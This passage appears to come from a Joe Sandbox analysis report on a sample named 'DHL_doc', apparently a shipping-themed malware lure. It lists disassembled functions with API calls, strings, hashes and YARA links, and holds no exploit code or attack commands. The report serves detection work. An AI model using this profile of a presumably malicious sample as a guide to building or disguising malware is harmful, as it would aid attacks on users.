Opcode ID: 3b07bc2a409f40c70d8628408d8b0cb411fba5aaa5a8fe3b871dd4039bd8cf78
Instruction ID: 25426eefef1ce35f1fe4810eb892f22dab3cb87e9c251ca07ee143a27279074c
Opcode Fuzzy Hash: 3b07bc2a409f40c70d8628408d8b0cb411fba5aaa5a8fe3b871dd4039bd8cf78
Instruction Fuzzy Hash: F441D834D0CBDA6DFF308760A4043B5BEA0AF11364F48805ADAC6575C2EBE499C4F7A2

Function 00F4055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F405BC
inet_addr.WSOCK32(?), ref: 00F4061C
gethostbyname.WSOCK32(?), ref: 00F40628
IcmpCreateFile.IPHLPAPI ref: 00F40636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F406C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F406E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00F407B9
WSACleanup.WSOCK32 ref: 00F407BF

Strings

Ping, xrefs: 00F40676

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8c208c5f288e8948fb396edde4dfa4b54267d940cca5fded40f8e482ce1e5892
Instruction ID: cebf978b92b1d0f3ff12c20babc538a1b280bbbc4fca42718c75cf01a724b890
Opcode Fuzzy Hash: 8c208c5f288e8948fb396edde4dfa4b54267d940cca5fded40f8e482ce1e5892
Instruction Fuzzy Hash: CB916D359043019FD720DF15C588F1ABBE0EF44328F158599EA6A9B7A2CB31ED41DF92

Function 00F48CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00F48CF3

Part of subcall function 00F28E54: _wcslen.LIBCMT ref: 00F28E77

_wcslen.LIBCMT ref: 00F48D4E
_wcslen.LIBCMT ref: 00F48D9C
_wcslen.LIBCMT ref: 00F48DDC
_wcslen.LIBCMT ref: 00F48E6E

Strings

stdcall, xrefs: 00F48DD6, 00F48DDB
none, xrefs: 00F48E65, 00F48E6A
cdecl, xrefs: 00F48D48, 00F48D4D
winapi, xrefs: 00F48D96, 00F48D9B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 1ba0d69d7965ce322a5d7ec218003940973af62d45400ad78a0b91a870aecaa9
Instruction ID: aa9a511ba76c6f79d8b03a040ac4d8bb1276f01866997efe8c1ac45ba5079ffe
Opcode Fuzzy Hash: 1ba0d69d7965ce322a5d7ec218003940973af62d45400ad78a0b91a870aecaa9
Instruction Fuzzy Hash: 9451A632E001169BCB14DFACC9409BEBBF5BF64364B244229E826E72C5DB35DD42E790

Function 00F4372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00F43774
CoUninitialize.OLE32 ref: 00F4377F
CoCreateInstance.OLE32(?,00000000,00000017,00F5FB78,?), ref: 00F437D9
IIDFromString.OLE32(?,?), ref: 00F4384C
VariantInit.OLEAUT32(?), ref: 00F438E4
VariantClear.OLEAUT32(?), ref: 00F43936

Strings

NULL Pointer assignment, xrefs: 00F4381E
Invalid parameter, xrefs: 00F43865
Failed to create object, xrefs: 00F437E4, 00F4389A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d37617934a1c274587e168f8200be9f237e76afc19f8b44a44b119498e2443b7
Instruction ID: 3fa7b0280fb6b383be215441cbe091253cbd06786ef82683aaf8a4af18035d4e
Opcode Fuzzy Hash: d37617934a1c274587e168f8200be9f237e76afc19f8b44a44b119498e2443b7
Instruction Fuzzy Hash: 5661B272608311AFD310EF54C889F6ABBE8EF48715F10081DF9859B291D774EE49EB92

Function 00F33388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F333CF

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F333F0

Strings

"%s" (%d) : ==> %s:, xrefs: 00F33522
Line %d (File "%s"):, xrefs: 00F33443, 00F3345C
Error: , xrefs: 00F334D1
^ ERROR , xrefs: 00F3349E
Incorrect parameters to object property !, xrefs: 00F334AB
"%s" (%d) : ==> %s:%s%s, xrefs: 00F33504

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 30a00ec400871302270ed1dc6b2c6774e5f50f02d4c97c88d46eda517aa82ad3
Instruction ID: 40fdb66595b717cc70a19021b0f0622ac5761ea7df2f0bf95365ce284ccfa17c
Opcode Fuzzy Hash: 30a00ec400871302270ed1dc6b2c6774e5f50f02d4c97c88d46eda517aa82ad3
Instruction Fuzzy Hash: 9B519032D0020AAADF15EBE0DE46EEEB7B8AF04340F145169F50573052EB366F59EB61

Function 00F2B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F2B5FC
_wcslen.LIBCMT ref: 00F2B608
_wcslen.LIBCMT ref: 00F2B64D
_wcslen.LIBCMT ref: 00F2B68C
_wcslen.LIBCMT ref: 00F2B6C7

Strings

KEYS, xrefs: 00F2B647, 00F2B64C
EXISTS, xrefs: 00F2B686, 00F2B68B
REMOVE, xrefs: 00F2B602, 00F2B607
APPEND, xrefs: 00F2B6C1, 00F2B6C6

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 99d93543552ede2ba237652c15cf741c36d12e3343e96d2a85b0fd3099fedd83
Instruction ID: 6db4d3ea7f0b0e1ecec233833bc61509b5fa11a56bc91f514c68ffbd57740a45
Opcode Fuzzy Hash: 99d93543552ede2ba237652c15cf741c36d12e3343e96d2a85b0fd3099fedd83
Instruction Fuzzy Hash: 3141E832E0013B9BCB106F7D98905BE7BA5FFA0764B244169EC22E7285E735CD81E790

Function 00F35393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F353A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F35416
GetLastError.KERNEL32 ref: 00F35420
SetErrorMode.KERNEL32(00000000,READY), ref: 00F354A7

Strings

INVALID, xrefs: 00F35459
READY, xrefs: 00F35460, 00F35468
READONLY, xrefs: 00F35452
NOTREADY, xrefs: 00F3544B
UNKNOWN, xrefs: 00F35444

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: fb4c156fedba5e99e00a1e06c69b856bdcdd882b4befb8825316ad03ec69d36b
Instruction ID: b1aff74ee17ec81fab88c78914058ff48c0f40bce69f364241248b98f47116ce
Opcode Fuzzy Hash: fb4c156fedba5e99e00a1e06c69b856bdcdd882b4befb8825316ad03ec69d36b
Instruction Fuzzy Hash: 1C31B276E006049FD714DF68C894FEABBB4EF84725F148069E906DB292D731DD82EB90

Function 00F53C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00F53C79
SetMenu.USER32(?,00000000), ref: 00F53C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F53D10
IsMenu.USER32(?), ref: 00F53D24
CreatePopupMenu.USER32 ref: 00F53D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F53D5B
DrawMenuBar.USER32 ref: 00F53D63

Strings

F, xrefs: 00F53D4E
0, xrefs: 00F53C54

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 08abe82897db05c9f5183d9fb8aa21a30b3745134c1a3602fdb8f792a751ba21
Instruction ID: a3527d560f39b714a3e0a026252bebfac49a0fca2780458ea60fbe7e29a3faf9
Opcode Fuzzy Hash: 08abe82897db05c9f5183d9fb8aa21a30b3745134c1a3602fdb8f792a751ba21
Instruction Fuzzy Hash: 12414C75A01309AFDB14CFA4D844B9A77B5FF49391F140029FE46A7360D770AA14EF94

Function 00F21EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F23CCA

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F21F64
GetDlgCtrlID.USER32 ref: 00F21F6F
GetParent.USER32 ref: 00F21F8B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F21F8E
GetDlgCtrlID.USER32(?), ref: 00F21F97
GetParent.USER32(?), ref: 00F21FAB
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F21FAE

Strings

ComboBox, xrefs: 00F21EEC
ListBox, xrefs: 00F21F21

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 0ccc71264215cea540a7974165bc9ab6412575b3176ab059b5cc04bf8fead28a
Instruction ID: 052b78df98263daf4b9f7de38aed0a019171bede434d602be096d01071a49599
Opcode Fuzzy Hash: 0ccc71264215cea540a7974165bc9ab6412575b3176ab059b5cc04bf8fead28a
Instruction Fuzzy Hash: 8621C571D00318BFCF04AFA0DD55EEEBBB4EF16310B100115F96567291CB395A15EB64

Function 00F53A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F53A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F53AA0
GetWindowLongW.USER32(?,000000F0), ref: 00F53AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F53AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F53B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F53BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F53BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F53BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F53BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F53C13

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b2b5266ba18e7ebe82d5ddc1f6c1dc8f5b152937b0894082fccd811d8386a52c
Instruction ID: 8587e49bb9c2f1e6b6c99c3b882dfeb825f87c333a943352cc6fa9c9b47ab9e9
Opcode Fuzzy Hash: b2b5266ba18e7ebe82d5ddc1f6c1dc8f5b152937b0894082fccd811d8386a52c
Instruction Fuzzy Hash: CE617B75900248AFDB11DFA8CC81EEE77F8EB49710F1001AAFA15E72A1C774AE45EB50

Function 00F2B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F2B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B165
GetWindowThreadProcessId.USER32(00000000), ref: 00F2B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F2A1E1,?,00000001), ref: 00F2B21D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 054a4811a1ba78d6aa523f286800612bd8494f785b6f9afdaf7b561998b60dfd
Instruction ID: 5a074c8a514f2d9a01194c2073236f62f988624c4323200c44c756c88da6be70
Opcode Fuzzy Hash: 054a4811a1ba78d6aa523f286800612bd8494f785b6f9afdaf7b561998b60dfd
Instruction Fuzzy Hash: 93318B71910318FFDB119F24EC58B7E7BA9BB51326F104006FE06D61A1D7B49A40EFA0

Function 00EF2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00EF2C94

Part of subcall function 00EF29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000), ref: 00EF29DE
Part of subcall function 00EF29C8: GetLastError.KERNEL32(00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000,00000000), ref: 00EF29F0

_free.LIBCMT ref: 00EF2CA0
_free.LIBCMT ref: 00EF2CAB
_free.LIBCMT ref: 00EF2CB6
_free.LIBCMT ref: 00EF2CC1
_free.LIBCMT ref: 00EF2CCC
_free.LIBCMT ref: 00EF2CD7
_free.LIBCMT ref: 00EF2CE2
_free.LIBCMT ref: 00EF2CED
_free.LIBCMT ref: 00EF2CFB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 385f491af0d2376e655ecd9f2d793805919f25cee185eb837290746717f7d64a
Instruction ID: f5ee84a719fca758f5bf373979646722fccb63d39667a918663c0f6d21abf0cf
Opcode Fuzzy Hash: 385f491af0d2376e655ecd9f2d793805919f25cee185eb837290746717f7d64a
Instruction Fuzzy Hash: FA11937654010DAFCB02EF94D882CED3BA5FF45350F4154A9FB48AB222DB71EE509B90

Function 00EC1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EC1459
OleUninitialize.OLE32(?,00000000), ref: 00EC14F8
UnregisterHotKey.USER32(?), ref: 00EC16DD
DestroyWindow.USER32(?), ref: 00F024B9
FreeLibrary.KERNEL32(?), ref: 00F0251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F0254B

Strings

close all, xrefs: 00EC1454

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: c12582905e774db2b16c3024cd73ba326cce56d5a9fa5b28212f01038022bee6
Instruction ID: e8fc750ba19c59fb954b020f2aeeeffa4f287cb0b6e52a45513f18690a1d8cd3
Opcode Fuzzy Hash: c12582905e774db2b16c3024cd73ba326cce56d5a9fa5b28212f01038022bee6
Instruction Fuzzy Hash: 09D16A316012128FCB19EF14C999F69F7A0BF06710F1451ADE94A7B292CB32AD13EF95

Function 00F37DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F37FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00F37FC1
GetFileAttributesW.KERNEL32(?), ref: 00F37FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00F38005
SetCurrentDirectoryW.KERNEL32(?), ref: 00F38017
SetCurrentDirectoryW.KERNEL32(?), ref: 00F38060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F380B0

Strings

*.*, xrefs: 00F38066

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 101b48812af3ab046c574ccc2d2c97d2f192e720f24ff413e9259b8e50c9e373
Instruction ID: 89c828a8a8ceb48b1e06d902859cd02eca43c2ed438442c253780740191ab5ca
Opcode Fuzzy Hash: 101b48812af3ab046c574ccc2d2c97d2f192e720f24ff413e9259b8e50c9e373
Instruction Fuzzy Hash: AE8191B29083459BCB34EF14C844AAEB3E8BF88370F14485EF885D7250DB75DD85AB92

Function 00EC5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00EC5C7A

Part of subcall function 00EC5D0A: GetClientRect.USER32(?,?), ref: 00EC5D30
Part of subcall function 00EC5D0A: GetWindowRect.USER32(?,?), ref: 00EC5D71
Part of subcall function 00EC5D0A: ScreenToClient.USER32(?,?), ref: 00EC5D99

GetDC.USER32 ref: 00F046F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F04708
SelectObject.GDI32(00000000,00000000), ref: 00F04716
SelectObject.GDI32(00000000,00000000), ref: 00F0472B
ReleaseDC.USER32(?,00000000), ref: 00F04733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F047C4

Strings

U, xrefs: 00F04693

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: e42766ff12b75b9037c4ebf7eb97c3486266b996365850bd05cddad5967a1d90
Instruction ID: 579c910a9f199fdb00317aca4021f3b50d4ff3c901c6644f3ec2003162724b6b
Opcode Fuzzy Hash: e42766ff12b75b9037c4ebf7eb97c3486266b996365850bd05cddad5967a1d90
Instruction Fuzzy Hash: 7771E471900209DFCF218F64C984EFA7BB1FF4A365F144269EE556A1A6D331A881FF50

Function 00F3359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F335E4

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

LoadStringW.USER32(00F92390,?,00000FFF,?), ref: 00F3360A

Strings

"%s" (%d) : ==> %s:, xrefs: 00F33742
^ ERROR, xrefs: 00F336C9
Line %d (File "%s"):, xrefs: 00F3366B
Error: , xrefs: 00F336EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00F33724

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
